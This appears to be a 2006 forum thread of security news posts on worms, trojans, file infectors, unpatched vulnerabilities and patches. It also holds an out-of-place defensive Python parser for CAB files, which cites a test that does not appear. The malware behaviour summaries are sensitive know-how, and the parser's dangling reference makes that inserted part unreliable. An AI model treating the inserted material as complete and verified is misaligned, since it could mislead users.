by harry waldron, cpcu, ccp · about 18 years ago
In reply to Harry Waldron
The social engineering approach of “you did something wrong” can cause folks to drop their guard … According to McAfee, the web based malware download sites seem to be shutdown, which thankfully happens quickly after these attacks are launched.
New Bagle variant with “lawsuit theme” spreading
http://vil.nai.com/vil/content/v_138776.htm
QUOTE: McAfee AVERT has observed instances of this threat, infected with W32/Sality, spreading in the wild. W32/Bagle.dy@MM is a trojan downloader and mailing worm that uses its own SMTP engine to send itself to the email addresses that it harvests on the infected computer.
-
March 5, 2006 at 7:01 pm #3085088
ICABDI.A – New POC Microsoft Infopath XSN file infector
by harry waldron, cpcu, ccp · about 18 years ago
In reply to Harry Waldron
This new proof-of-concept virus has some errors in the code and primarily represents a brand new area of attack, as the 1st virus to infect XSN file extensions. AV vendors are responding with protection as Trend and Symantec have released signature files to address this new exposure.
ICABDI.A – New POC Microsoft Infopath XSN file infector
http://secunia.com/virus_information/27382/icabdi.a/
QUOTE: This is the Trend Micro detection for the proof-of-concept malware that attempts to infect Microsoft Infopath .XSN files. Infopath is an application used to develop XML-based user forms. It creates a temporary folder named iCab. It then copies a target XSN file that it attempts to infect in the said folder. The contents of the file are then extracted.
To infect the XSN file, it inserts a malicious script inside the script.js of the target XSN file. To clean up traces of its malicious routine, it then attempts to recreate the original (already infected) file, and then delete iCab and all its contents. However, due to errors in its code, it is unable to perform its file infection and cleanup routines.
-
March 5, 2006 at 7:02 pm #3085087
Microsoft Visual Studio DBP/SLN File Handling Buffer Overflow
by harry waldron, cpcu, ccp · about 18 years ago
In reply to Harry Waldron
The following new buffer-overflow vulnerability is currently unpatched and could be crafted by the bad guys into a future exploit. Developers should exercise caution with untrusted DBP/SLN files.
Microsoft Visual Studio DBP/SLN File Handling Buffer Overflow
http://www.frsirt.com/english/advisories/2006/0825
Rated as : Moderate Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-03-05
Technical Description: A vulnerability has been identified in Microsoft Visual Studio and Microsoft Visual InterDev, which could be exploited by attackers to execute arbitrary commands. This flaw is due to a buffer overflow error when processing specially crafted Database Project (.dbp) or Solution (.sln) files containing an overly long “DataProject” field, which could be exploited by attackers to compromise a vulnerable system by tricking a user into opening a malicious “.dbp” or “.sln” file.
Affected Products
Microsoft Visual Studio version 6.0 SP6 and prior
Microsoft Visual InterDev version 6.0 SP6 and prior
Solution: The FrSIRT is not aware of any officially supplied patch for this issue.
-
March 8, 2006 at 6:43 am #3086883
Hotmatom Worm – New MSN Hotmail based worm deletes files
by harry waldron, cpcu, ccp · about 18 years ago
In reply to Harry Waldron
This is a worm written in VB with the following characteristics:
1. The worm attempts to lure victims to follow a URL link, in so doing downloading a copy of it, and infecting themselves. It monitors Internet Explorer windows in order to detect when a new message is being created within MSN Hotmail.
2. The worm monitors the browser window to detect when MSN Hotmail is being used for sending new mail, and inserts text into such messages, which contains a URL from where the worm is downloaded if the recipient clicks on the link.
3. It deletes files on the root of C: and A:, and copies itself there in place of those files, appending a .EXE file extension.
Hotmatom Worm – New MSN Hotmail based worm deletes files
http://secunia.com/virus_information/27456/hotmatom/
http://vil.nai.com/vil/content/v_138829.htm
http://www.sarc.com/avcenter/venc/data/w32.hotmatom.html -
March 10, 2006 at 9:02 pm #3267570
McAfee – DAT 4715 False positive fixed with 4716
by harry waldron, cpcu, ccp · about 18 years ago
In reply to Harry Waldron
DAT 4716 was released to quickly address scanning errors that created false positive issues in release 4715. The CTX virus was being detected for files that truly aren’t infected with a virus.
-
April 11, 2006 at 11:26 am #3286655
Microsoft Security Updates – April 2006
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
The latest updates have just become available and were successfully installed on my laptop and desktop at work. These include security updates for Windows, Internet Explorer and Office and should be applied by individual users or companies as quickly as possible.
http://www.microsoft.com/technet/security/Bulletin/ms06-Apr.mspx
-
April 13, 2006 at 8:41 am #3103540
Avarta.A – First Microsoft Publisher Virus appears
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
Kaspersky has noted the 1st MS/Publisher virus to appear in the wild. PUB file extensions will most likely be necessary to include in scanning routines.
Avarta.A – First Microsoft Publisher Virus appears
http://www.viruslist.com/en/viruses/encyclopedia?virusid=117864
This is the first known virus that infects MS Publisher (*.pub) documents. It is a very simple overwriting virus, written in Visual Basic for Applications (VBA). The virus uses a rather crude replication method – it searches for Publisher documents and copies itself over them, thus destroying their content. Avarta gets the location which it will scan for Publisher documents to infect by opening the registry and fetching the key for the recently used files in Publisher. It sets the macro Security Level in Publisher to Low. This is a common technique in macro viruses.
-
April 13, 2006 at 8:09 pm #3105667
Firefox 1.5.0.2 – New version with security updates
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
A new version of Firefox is now available. Current users who have autoupdate capabilities will most likely be automatically prompted for updates. More links are noted below:
Product Page
http://www.mozilla.com/firefox/
Release Notes
http://www.mozilla.com/firefox/releases/1.5.0.2.html
Security Enhancements
http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox1.5.0.2
-
April 14, 2006 at 9:26 am #3105541
Microsoft Update – A more complete approach than Windows Update
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
It was an interesting coincidence that F-Secure is commenting on the new Microsoft Update approach, as I used this approach for the 1st time on April 11th on some of my home and office PCs. Microsoft Update is essentially Windows Update plus Office Update plus perhaps other products that might be found during the more comprehensive checking performed by this facility. The Microsoft Update process worked well in my own testing of it and it applied all Windows and Office related updates properly. As noted by F-Secure, you must be at least Office XP to use this facility.
F-Secure article: Forget about Windows update (use Microsoft update instead)
http://www.f-secure.com/weblog/archives/archive-042006.html#00000854
Microsoft Update Link
http://update.microsoft.com/microsoftupdate/ -
April 19, 2006 at 7:00 pm #3287459
ISC Article — Banks use non-secure login forms
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
The ISC published a good finding this afternoon. This is good advice that extends beyond just banks. ALL ORGANIZATIONS requesting info should use SSL and other secure server techniques.
ISC Article — Banks use non-ssl login forms
http://www.incidents.org/diary.php?storyid=1277
SecureWebBank.com – SSL Login Page Status
https://www.securewebbank.com/loginssluse.html -
April 21, 2006 at 8:36 am #3285157
Microsoft Releases SQL Server 2005 Service Pack 1
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
Microsoft released Service Pack 1 for SQL-Server on April 19 with functionality improvements for its latest version of SQL-Server.
SQL Server 2005 Service Pack 1 – Home Page
http://www.microsoft.com/sql/sp1.mspx
Microsoft Releases SQL Server 2005 Service Pack 1 – Press Release
http://www.microsoft.com/presspass/press/2006/apr06/04-19SQLExpands06PR.mspx
SQL Server 2005 SP1 Arrives with Production-Ready Mirroring
http://www.eweek.com/article2/0,1759,1951914,00.asp
QUOTE: Microsoft on April 19 introduced Service Pack 1 for SQL Server 2005, the server’s first major update since its launch Nov. 7, 2005. SP1 encompasses several new features besides database mirroring, including SQL Server Management Studio Express and additional, flexible options for independent software vendors.
The SP1 release is the first result of a new SQL Server “customer-collaboration model” Microsoft has instituted, which uses customer feedback as the company formulates feature and security updates.
Key new features include the production-ready version of database mirroring, in which the primary production server is mirrored at all times by a standby server. “This allows for automated, seamless failover between primary and standby server, if the primary server needs to come down,” SQL Server Senior Product Manager Carol Dullmeyer told eWEEK. “It’s a really critical feature.”
Microsoft sketches out its DB roadmap
http://www.eweek.com/article2/0,1895,1947288,00.asp -
April 21, 2006 at 8:48 am #3285148
Microsoft will address MS06-015 issues for affected customers
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
If the April updates are working well, there is no need to reinstall the MS06-015 security update. As a limited number of users were impacted, Microsoft is addressing this with a release. This can be found as follows:
MSRC Blog Posting – This is Great site to bookmark for Patch news & info
http://blogs.technet.com/msrc/archive/2006/04/21/425838.aspx
When the update is re-released, it’s going to be very much targeted to people who are having the problem, or people who have not installed MS06-015 yet. That means if you have already installed MS06-015 and are not having the problem, there’s no action here for you.
-
May 8, 2006 at 8:57 am #3162444
Oracle Export Extensions – Public Exploit Code for Unpatched Vulnerability
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
All Oracle IT professionals and DBAs should be careful with export functions and file extensions in processing files, as noted by the CERT advisory below:
Oracle Export Extensions – Public Exploit Code for Unpatched Vulnerability
http://www.us-cert.gov/current/current_activity.html#unpatorcle
QUOTE: US-CERT is aware of publicly available, working exploit code for an unpatched vulnerability in Oracle Export Extensions. Successful exploitation may allow a remote attacker with some authentication credentials to execute arbitrary SQL statements with elevated privileges. This may allow an attacker to access and modify sensitive information within an Oracle database.
More information about this vulnerability can be found in the following:
- Vulnerability Note: VU#932124
- Secunia Advisory: SA19860
- Security Focus: Oracle Vulnerability Report
- Red Database Security: Oracle Exploit Report
US-CERT recommends the following actions to mitigate the security risks:
- Restrict access to Oracle:
Only known and trusted users should be granted access to Oracle. Additionally, user accounts should be granted only those privileges needed to perform necessary tasks.
- Change login credentials for default Oracle accounts:
Oracle creates numerous default accounts when it is installed. Upon installation, accounts that are not needed should be disabled and the login credentials for needed accounts should be changed.
-
May 22, 2006 at 2:03 pm #3151370
Acunetix – New company provides several Website security articles
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new company, which provides web protection services, has a number of informative articles related to web security.
http://www.acunetix.com/Websitesecurity/
Learn more about web attacks:
- SQL injection
- Cross Site Scripting
- CRLF Injection
- Directory Traversal
- Authentication Hacking
- Google Hacking
Security Articles:
QUOTE: Start-up Acunetix protects Web sites against unauthorized modifications and denial-of-service attacks. The company announced its Web Vulnerability Scanner last July as a tool for identifying vulnerabilities before they can be exploited. Acunetix also recently announced a useful site for anyone interested in security Web sites (as usual, I have no relationship whatsoever with the vendor)
-
May 22, 2006 at 2:03 pm #3151366
F-Secure reports over 200 Mobile malware threats developed so far
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Malware developments continue for mobile users, and users should continue to avoid unusual messages or any files offered to them in that environment.
F-Secure reports over 200 Mobile malware threats developed so far
http://www.f-secure.com/weblog/archives/archive-042006.html#00000864
QUOTE: In less than half a year our tally of mobile malware has doubled to 200. Many of those in that count are variants of already detected viruses, but the speed at which the number grows has real implications for all those with unprotected smartphones. At the least, this is a testing ground. What comes next? -
May 22, 2006 at 2:03 pm #3151367
Firefox 1.5.0.3 released to address DoS vulnerability
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new DoS vulnerability was patched and all Firefox users should update to the latest version.
Firefox 1.5.0.3 released to address DoS vulnerability
http://www.mozilla.com/firefox/releases/1.5.0.3.html
http://www.incidents.org/diary.php?storyid=1307
http://secunia.com/advisories/19802/
QUOTE: What’s New in Firefox 1.5.0.3 – Firefox 1.5.0.3 is a security update that is part of our ongoing program to provide a safe Internet experience for our customers. We recommend that all users upgrade to this latest version. Security fix for denial of service vulnerability. Release Date: May 2, 2006
-
May 22, 2006 at 2:03 pm #3151368
Kittykat – New RAR virus threat
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Users should be cautious with all RAR files processed in email or shared by other sources.
Kittykat – New RAR virus threat
http://secunia.com/virus_information/28958/kittykat/
http://www.sarc.com/avcenter/venc/data/w32.kittykat.html
W32.Kittykat is a virus that splits itself into many parts, and adds these parts to all RAR archive files in the current directory and the parent directory. The virus may arrive as an archive file. The virus requires that the archive is extracted with the full directory structure, and that the file start.bat is then executed.
When W32.Kittykat is executed, it performs the following actions:
1. Reconstructs itself as the following file: [RANDOM FILENAME].exe
2. Displays a message to announce its presence.
3. Searches for files to infect. The virus has no infection marker, so an already infected RAR archive file in the current or parent directory will be infected repeatedly. -
May 22, 2006 at 2:03 pm #3151369
Microsoft Security bulletins – May 2006
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
All Windows users should apply these updates promptly to ensure their PCs are properly protected.
Microsoft Security bulletins – May 2006
http://www.microsoft.com/technet/security/Bulletin/ms06-May.mspx
Critical — Vulnerability in Microsoft Exchange Could Allow Remote Code Execution (916803)
http://www.microsoft.com/technet/security/Bulletin/ms06-019.mspx
Critical — Vulnerabilities in Macromedia Flash Player from Adobe Could Allow Remote Code Execution (913433)
http://www.microsoft.com/technet/security/Bulletin/ms06-020.mspx
Moderate — Vulnerability in Microsoft Distributed Transaction Coordinator Could Allow Denial of Service (913580)
http://www.microsoft.com/technet/security/Bulletin/ms06-018.mspx -
May 22, 2006 at 2:03 pm #3151361
Sophos Anti-Virus products – Critical vulnerability in scanning CAB files
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Critical vulnerability in Sophos Anti-Virus products
http://www.incidents.org/diary.php?storyid=1325
Advisory: Crafted Microsoft CAB file can allow arbitrary code to be run
http://www.sophos.com/support/knowledgebase/article/4934.html
QUOTE: A vulnerability has been discovered in Sophos’s unpacking of Microsoft Cabinet files, whereby a Microsoft Cabinet (CAB) file could be deliberately crafted to allow an attacker to execute arbitrary code on a vulnerable installation of Sophos Anti-Virus. Although theoretically a risk, Sophos has not seen any examples of malware attempting to employ this vulnerability.
-
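Archive unpackers inside AV engines get crashed by crafted files when they trust lengths and offsets read from the file itself. The parser below is an added example, not Sophos code and not from the advisory: it reads the CAB CFHEADER, CFFOLDER and CFFILE records (no decompression) and validates every file-supplied count, offset and string length against the real buffer before using it. The record layout is the public Microsoft Cabinet format; the 256-byte name cap and the 10,000-entry ceiling are this example's own limits, and build_minimal_cab only exists to construct a header-only test file.

```python
"""Defensive CAB (Microsoft Cabinet) header parser.

Added example, not Sophos code and not from the original post. Parses
CFHEADER/CFFOLDER/CFFILE only and bounds-checks every field taken from the
file. MAX_NAME and MAX_ENTRIES are this example's own limits, not CAB spec values.
"""
import struct

CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")   # 36 bytes
CFFOLDER = struct.Struct("<IHH")              # 8 bytes, plus optional per-folder reserve
CFFILE_FIXED = struct.Struct("<IIHHHH")       # 16 bytes, then NUL-terminated szName
FLAG_PREV, FLAG_NEXT, FLAG_RESERVE = 0x1, 0x2, 0x4
MAX_NAME = 256        # example's own bound on szName
MAX_ENTRIES = 10000   # example's own bound on cFolders / cFiles


def _need(data, offset, length, what):
    """Raise unless data[offset:offset+length] lies entirely inside the buffer."""
    if offset < 0 or length < 0 or offset + length > len(data):
        raise ValueError(f"{what}: {length} bytes at {offset} exceed {len(data)}-byte buffer")


def _cstring(data, offset, what):
    """Read a NUL-terminated string bounded by MAX_NAME and by the buffer end."""
    end = data.find(b"\x00", offset, min(len(data), offset + MAX_NAME + 1))
    if end < 0:
        raise ValueError(f"{what}: name not terminated within {MAX_NAME} bytes")
    return data[offset:end].decode("latin-1"), end + 1


def parse_cab(data):
    """Return (folders, files) from a CAB header; raise ValueError if malformed."""
    _need(data, 0, CFHEADER.size, "CFHEADER")
    (sig, _, cb_cabinet, _, coff_files, _, v_minor, v_major,
     c_folders, c_files, flags, _set_id, _i_cabinet) = CFHEADER.unpack_from(data, 0)
    if sig != b"MSCF":
        raise ValueError("bad signature")
    if (v_major, v_minor) != (1, 3):
        raise ValueError(f"unsupported version {v_major}.{v_minor}")
    if cb_cabinet > len(data):
        raise ValueError(f"cbCabinet {cb_cabinet} exceeds buffer {len(data)}")
    if c_folders == 0 or c_folders > MAX_ENTRIES or c_files > MAX_ENTRIES:
        raise ValueError("implausible folder/file count")
    pos = CFHEADER.size
    cb_folder_reserve = 0
    if flags & FLAG_RESERVE:
        _need(data, pos, 4, "reserve sizes")
        cb_header_reserve, cb_folder_reserve, _cb_data_reserve = struct.unpack_from("<HBB", data, pos)
        pos += 4
        _need(data, pos, cb_header_reserve, "header reserve")   # attacker-chosen length
        pos += cb_header_reserve
    if flags & FLAG_PREV:          # szCabinetPrev, szDiskPrev
        _, pos = _cstring(data, pos, "szCabinetPrev")
        _, pos = _cstring(data, pos, "szDiskPrev")
    if flags & FLAG_NEXT:          # szCabinetNext, szDiskNext
        _, pos = _cstring(data, pos, "szCabinetNext")
        _, pos = _cstring(data, pos, "szDiskNext")
    folders = []
    for i in range(c_folders):
        _need(data, pos, CFFOLDER.size + cb_folder_reserve, f"CFFOLDER[{i}]")
        coff_start, c_data, compress = CFFOLDER.unpack_from(data, pos)
        if coff_start > len(data):
            raise ValueError(f"CFFOLDER[{i}] data offset {coff_start} outside buffer")
        folders.append({"data_offset": coff_start, "blocks": c_data, "compression": compress & 0xF})
        pos += CFFOLDER.size + cb_folder_reserve
    if coff_files < pos:
        raise ValueError("coffFiles points inside the header/folder area")
    pos = coff_files
    files = []
    for i in range(c_files):
        _need(data, pos, CFFILE_FIXED.size, f"CFFILE[{i}]")
        size, _folder_off, i_folder, _date, _time, attribs = CFFILE_FIXED.unpack_from(data, pos)
        if i_folder >= c_folders and i_folder < 0xFFFD:   # 0xFFFD-0xFFFF: spans cabinets
            raise ValueError(f"CFFILE[{i}] references folder {i_folder} of {c_folders}")
        name, pos = _cstring(data, pos + CFFILE_FIXED.size, f"CFFILE[{i}] name")
        files.append({"name": name, "size": size, "folder": i_folder, "attribs": attribs})
    return folders, files


def build_minimal_cab(names):
    """Construct a header-only CAB (one folder, no CFDATA) for tests and demos."""
    files_blob = b"".join(CFFILE_FIXED.pack(0, 0, 0, 0, 0, 0x20) + n.encode() + b"\x00" for n in names)
    coff_files = CFHEADER.size + CFFOLDER.size
    total = coff_files + len(files_blob)
    header = CFHEADER.pack(b"MSCF", 0, total, 0, coff_files, 0, 3, 1, 1, len(names), 0, 0, 0)
    folder = CFFOLDER.pack(total, 0, 0)      # data would begin at the end of the header area
    return header + folder + files_blob


if __name__ == "__main__":
    folders, files = parse_cab(build_minimal_cab(["readme.txt", "setup.exe"]))
    print(folders, [f["name"] for f in files])
```

Every ValueError raised here corresponds to a field an unpacker written in C would otherwise feed straight into a memcpy, a strcpy into a fixed-size name buffer, or a pointer computed from coffFiles; the crafted-file cases in the test below exercise exactly those fields.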
May 22, 2006 at 2:03 pm #3151362
Linux Security – The illusion of invulnerability
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
All environments must be properly protected, as security is a “process” of staying up-to-date, monitoring risks, and following best protective practices.
The illusion of invulnerability (see May 9th)
http://www.viruslist.com/en/weblog?calendar=2006-05
QUOTE: On Saturday “Linuxtag 2006” closed in Wiesbaden (Germany). According to the organisers, it’s Europe’s biggest Linux Expo. At the Kaspersky stand we talked to a lot of visitors. Pretty soon, it dawned on us exactly what the biggest threat to Linux systems is: the almost overwhelming belief in the invulnerability of Linux.
Nearly every visitor accepts the need to protect Windows against malicious code (although even at a Linux fair you find people believing that a firewall is all you need to keep viruses and worms away). But many people we spoke to were unable to think of Linux as potentially vulnerable; after all, they argued, a Linux user would never go online with root rights as typical Windows XP home users do. But such thinking overlooks some important facts:
– You don’t need to have root privileges to delete a user’s home directory or access his personal data – you only need to run malicious code with user privileges. (And not every user makes daily backups which could mitigate the potential damage.)
– The number of new malicious programs for an operating system isn’t related to the number of known security flaws, but to the number of installations. In Germany, the number of Linux distributions installed is growing rapidly, and overall, the number of malicious programs for Linux more than doubled between 2004 and 2005.
*Nix Malware Doubles
http://www.viruslist.com/en/analysis?pubid=184625030
– To access a system, a virus writer doesn’t need 300 vulnerabilities – one is enough.
– Vulnerabilities exist prior to their being identified by the developers who report them. Virus writers actively search for vulnerabilities, but keep their discoveries to themselves.
– Only a perfect system can offer perfect security. In his “Areas for Improvement in the 2.6 Kernel Development Process” Andrew Morton (lead maintainer of the Linux production kernel) pointed out that the number of new bugs in the current 2.6 kernel are causing concern, and might lead to the development process being halted until existing problems are fixed.
-
May 22, 2006 at 2:03 pm #3151363
Older OS may have caused Florida theater chain to be hit by virus
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
It’s important to always stay up-to-date on the latest security patches and Operating System versions.
Florida theater chain hit by virus attack
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9000400
QUOTE: Attackers may have had an easier time cracking the Muvico.com Web server because it is running Windows 2000, said Rich Miller, an analyst at Web tracking company Netcraft Ltd. Windows 2000 is an older version of Microsoft Corp.’s operating system, and it has been the subject of frequent widespread attacks, including last year’s Zotob virus. “Microsoft still supports Windows 2000 to the extent that if you’re current, you should be well-protected. But it is less secure than Windows Server 2003,” Miller said. Still, there remain a “substantial number of Web sites that continue to run on Windows 2000,” he said.
-
May 22, 2006 at 2:03 pm #3151364
Hoots – Network worm that could impact printing
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new virus is low-risk so far and spreads via unsecured network shares. It also prints a graphical image on network printers, which could impact paper and bandwidth consumption.
Hoots – Network worm that could impact printing
http://vil.mcafeesecurity.com/vil/content/v_139471.htm
http://secunia.com/virus_information/29007/hoots/
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FHOOTS%2EA
-
May 22, 2006 at 2:03 pm #3151365
Apple QuickTime Vulnerabilities – Update to v7.1
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
All users of Apple’s Quicktime video facility should update to 7.1
Apple QuickTime Vulnerabilities – Update to v7.1
http://www.us-cert.gov/cas/techalerts/TA06-132B.html
Apple QuickTime contains multiple vulnerabilities. Exploitation of these vulnerabilities could allow a remote attacker to execute arbitrary code or cause a denial-of-service condition. An attacker may be able to exploit this vulnerability by persuading a user to access a specially crafted file with a web browser. Disabling QuickTime in your web browser will defend against this attack vector.
-
May 22, 2006 at 2:04 pm #3151357
Internet Poker — New Rootkit Dangers
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
F-Secure has documented a new risk for online poker players, where a rootkit could potentially have been distributed to users.
Internet Poker — New Rootkit Dangers
http://www.f-secure.com/weblog/archives/archive-052006.html#00000881
http://www.f-secure.com/weblog/archives/archive-052006.html#00000878
http://www.f-secure.com/v-descs/small_la.shtml
http://securityresponse.symantec.com/avcenter/venc/data/trojan.checkraise.html
RBCalc.exe was a malicious software program present on the “Check Raised” website for a period of time. This site provides tools, articles and other various applications to online poker players. As a result, many online poker players could have been affected by this targeted attack. Trojan.Checkraise is a Trojan horse that steals passwords for popular online poker Web sites. It also opens a back door on the compromised computer and logs keystrokes. It sends confidential information to a remote attacker
Question: So a question for all you poker fanatics; when is this not a winning hand?
Answer: When your online poker login credentials have been stolen and your account drained. We have received no reports of this happening, but the possibility is definitely there. -
May 22, 2006 at 2:04 pm #3151358
Article: If you bank online — you and your money are targets
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Summary of key recommendations offered in the article:
1. Never click on URLs found in email
2. Call the bank directly if you are unsure of an email message
3. Keep AV and Firewall protection as up-to-date as possible
4. Go directly to your bank’s site through your web browser
5. Notify the bank ASAP if you become a victim of phishing and follow all procedures
Article: If you bank online — you and your money are targets
http://www.marketwatch.com/News/Story/4dpBNJKhD0VdlTbl2QT7HwbQ
QUOTE: There could be a hyperlink in the body of an e-mail that you think is your bank’s. An e-mail could contain a malicious program that follows your key strokes until you key in your bank password. Or, a weak system link may let a similar bug take advantage of your computer’s ability to store Web addresses you frequently visit. When a familiar Web address automatically appears in the URL box, you’re redirected to an imposter site seeking personal information.
An estimated $940 million was lost by consumers through phishing in 2005, says Gartner Inc., Stamford, Conn. Average loss per phishing case: $7,294, says Javelin Strategy & Research, Pleasanton, Calif
-
May 22, 2006 at 2:04 pm #3151359
MDropper Trojan – Exploits Zero Day vulnerability in MS Word
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This is rated low-risk everywhere and it’s not widespread — still folks should be careful with suspicious Word documents.
MDropper Trojan – Exploits Zero Day vulnerability in MS Word
http://vil.mcafeesecurity.com/vil/content/v_139539.htm
http://www.sarc.com/avcenter/venc/data/trojan.mdropper.h.html
http://secunia.com/virus_information/29277/mdropper.h/
http://securityresponse.symantec.com/avcenter/venc/data/backdoor.ginwui.html
Trojan.Mdropper.H is a Trojan horse that downloads other risks onto the compromised computer. This Trojan exploits a 0 day Microsoft Word vulnerability to drop Backdoor.Ginwui.
-
May 22, 2006 at 2:04 pm #3151360
GINWUI.B – New payload variant from MDropper based on 0Day Word Exploit
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Users should be careful with any spam email containing Word documents, as the vulnerability also allows automatic downloads of the GINWUI backdoor onto the system. A brand new variant of the backdoor component has just emerged and other variants may follow.
GINWUI.B – New payload variant from MDropper based on 0Day Word Exploit
http://secunia.com/virus_information/29302/ginwui.b/
http://secunia.com/virus_information/29299/bkdrginwui.b/
http://secunia.com/virus_information/29290/w97mmdropper.ab/
QUOTE: This backdoor arrives on a system as a file dropped by another malware that Trend Micro detects as W97M_MDROPPER.AC. When executed, it drops the files ZSYHIDE.DLL and ZSYDLL.DLL in the Windows system folder. This backdoor injects the said .DLL files, which are also detected as BKDR_GINWUI.B, into running processes to ensure memory residency and to hide its process, hence avoiding easy detection. Notably, it injects ZSYDLL.DLL into the Internet Explorer process. The said action causes the Internet Explorer to crash. Using TCP port 80, this backdoor attempts to access a remote server in scfzf.{BLOCKED}cp.net via Hyper Text Transfer Protocol (HTTP). It then listens for commands coming from a remote malicious user. It executes these commands locally on an infected system, providing the remote user virtual control over the system. The said routine compromises system security. This backdoor employs its rootkit capability in order to hide its files, process, and registry entry from an affected user, thus avoiding easy detection. In addition, it attempts to access a certain Web site.
-
May 23, 2006 at 6:00 am #3147090
Identity Theft impacts 26.5 million Veterans
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
A serious lapse in security has led to the theft of sensitive and confidential information for over 26.5 million Veterans.
Identity Theft impacts 26.5 million Veterans
http://seattletimes.nwsource.com/html/nationworld/2003012577_datatheft23.html
The burglary occurred May 3 in Wheaton, Md., according to a source with knowledge of the incident who requested anonymity because the matter is under investigation. A career data analyst, who was not authorized to take the information home, has been put on administrative leave pending the outcome of investigations by the FBI, local police and inspector general of the VA, Nicholson said. He would not identify the employee by name or title.
“They believe this was a random burglary and not targeted at this data,” Nicholson said. “There have been a series of burglaries in that community. … There is no indication at all that any use is being made of this data or even that they know that they have it.”
Guarding against identity theft
The Veterans Affairs Department says it is not necessary for veterans to contact financial institutions or cancel credit cards and bank accounts in case of identity theft. Here is what veterans can do to protect themselves:
Be vigilant. Carefully monitor bank and credit-card statements. Report unusual activity immediately to the financial institution involved and contact the Federal Trade Commission.
If you detect suspicious or unusual activity, do the following:
- Contact the fraud department of one of the three major credit bureaus:
- Close any account that has been tampered with or opened fraudulently.
- File a report with your local police department or the police department in the community where the identity theft took place.
- File a complaint with the Federal Trade Commission by using its identity-theft hotline at 877-438-4338, online at http://www.consumer.gov/idtheft, or by mail at Identity Theft Clearinghouse, Federal Trade Commission, 600 Pennsylvania Ave. NW, Washington, D.C. 20580.
Source: Veterans Affairs
-
May 24, 2006 at 4:06 pm #3147313
New Word Security Vulnerability and Limited Zero Day Exploit
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Some recent updates related to the new Word vulnerabilities and the very limited Zero Day exploit that has been crafted. Here’s hoping things stay quiet on the malware side until Microsoft develops a patch for this new vulnerability.
MSRC Blog entry
http://blogs.technet.com/msrc/archive/2006/05/23/429904.aspx
Critical Advisory on new Word Vulnerability
http://secunia.com/advisories/20153/
Microsoft Advisory
http://www.microsoft.com/technet/security/advisory/919637.mspx -
May 24, 2006 at 8:06 pm #3147252
Windows Vista – Guidelines for purchasing a PC now that can run this new OS
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
http://www.microsoft.com/technet/windowsvista/evaluate/hardware/vistarpc.mspx
Computers with the Windows Vista Capable PC logo will meet or exceed the requirements to deliver the core Windows Vista experiences such as innovations in security, reliability, organizing and finding information. They can also deliver key business features found in the Windows Vista Business and Windows Vista Enterprise versions, such as domain join.
-
May 25, 2006 at 8:06 pm #3156811
Banwarum Worm – Offers Tickets for the WORLD CUP?
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
There are no free lunches or World Cup tickets available by email offers of this type. The text of the message is in German and this new worm exploits the vulnerability addressed by MS04-007. Users should be cautious with all email messages.
Banwarum Worm – Offers Tickets for the WORLD CUP?
http://www.f-secure.com/weblog/archives/archive-052006.html#00000885
http://secunia.com/virus_information/29439/banwarum/
http://secunia.com/virus_information/29440/banwarum.dll/
http://secunia.com/virus_information/29438/ranchneg.a/
Diagram of worm behavior
http://www.trendmicro.com/vinfo/images/WORM_RANCHNEG_A_BD.gif
W32.Banwarum@mm is a mass-mailing worm that uses its own SMTP engine to send an email to addresses that it gathers from the compromised computer. The worm also spreads through the network by exploiting the Microsoft Windows ASN.1 Library Bit String Processing Variant Heap Corruption Vulnerability (as described in Microsoft Security Bulletin MS04-007). The worm also opens a back door via HTTP access.
-
May 27, 2006 at 12:06 pm #3158196
Corporate Symantec Anti-Virus Client vulnerability
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Symantec is working on a solution for an elevation of privileges that could occur with corporate clients. The retail versions (e.g., NAV 2006) are not impacted by this issue. Users should be cautious in email and website visitations until this issue is resolved.
Corporate Symantec Anti-Virus Client vulnerability
http://www.symantec.com/avcenter/security/Content/2006.05.25.html
Internet Storm Center Information
http://www.incidents.org/diary.php?storyid=1364
PRODUCTS IMPACTED
Symantec Client Security 3.1 a
Symantec Antivirus Corporate Edition 10.1
As best practice, Symantec strongly recommends the following:
* Restrict access to administration or management systems to privileged users only, with additional restricted access to the physical host system(s) if possible.
* Keep all operating systems and applications updated with the latest vendor patches.
